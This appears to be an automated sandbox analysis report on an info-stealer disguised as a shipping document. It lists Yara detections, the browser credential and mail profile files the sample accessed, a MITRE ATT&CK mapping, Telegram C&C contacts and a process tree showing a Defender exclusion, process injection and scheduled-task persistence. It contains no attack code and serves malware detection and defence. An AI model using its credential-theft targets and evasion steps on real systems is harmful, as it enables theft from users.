Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 736, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR
Source: Yara match | File source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.3718301984.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 736, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match; File source: 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 736, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR
                    Source: Yara match; File source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR
                    MITRE ATT&CK matrix, listed by tactic (the number in front of a technique is the report's own signature counter, kept exactly as extracted):

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                    Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                    Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Privilege Escalation: 111 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 31 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                    Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                    Discovery: 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 13 System Information Discovery; System Owner/User Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                    Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                    Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                    Behavior Graph ID: 1632061; Sample: Shipment advice H-BL Draft.exe; Startdate: 07/03/2025; Architecture: WINDOWS; Score: 100

                    Sample-level network contacts:
                    • reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP))
                    • api.telegram.org (Uses the Telegram API (likely for C&C communication))
                    • 2 other IPs or domains

                    Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

                    Process tree (as recovered from the behavior graph):
                    Shipment advice H-BL Draft.exe (started)
                      dropped: C:\Users\user\AppData\...\PrcGlGVKeUCXxg.exe (PE32); C:\...\PrcGlGVKeUCXxg.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpFBC0.tmp (XML); C:\...\Shipment advice H-BL Draft.exe.log (ASCII)
                      signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                      powershell.exe (started)
                        signature: Loading BitLocker PowerShell Module
                        conhost.exe (started)
                        WmiPrvSE.exe (started)
                      Shipment advice H-BL Draft.exe (started)
                        api.telegram.org 149.154.167.220, 443, 49751, 49755 TELEGRAMRU United Kingdom
                        checkip.dyndns.com 193.122.6.168, 49716, 49719, 49724 ORACLE-BMC-31898US United States
                        reallyfreegeoip.org 104.21.32.1, 443, 49717, 49718 CLOUDFLARENETUS United States
                      powershell.exe (started)
                        conhost.exe (started)
                      2 other processes
                        conhost.exe (started)
                    PrcGlGVKeUCXxg.exe (started)
                      signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
                      PrcGlGVKeUCXxg.exe (started)
                        signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                      schtasks.exe (started)
                        conhost.exe (started)
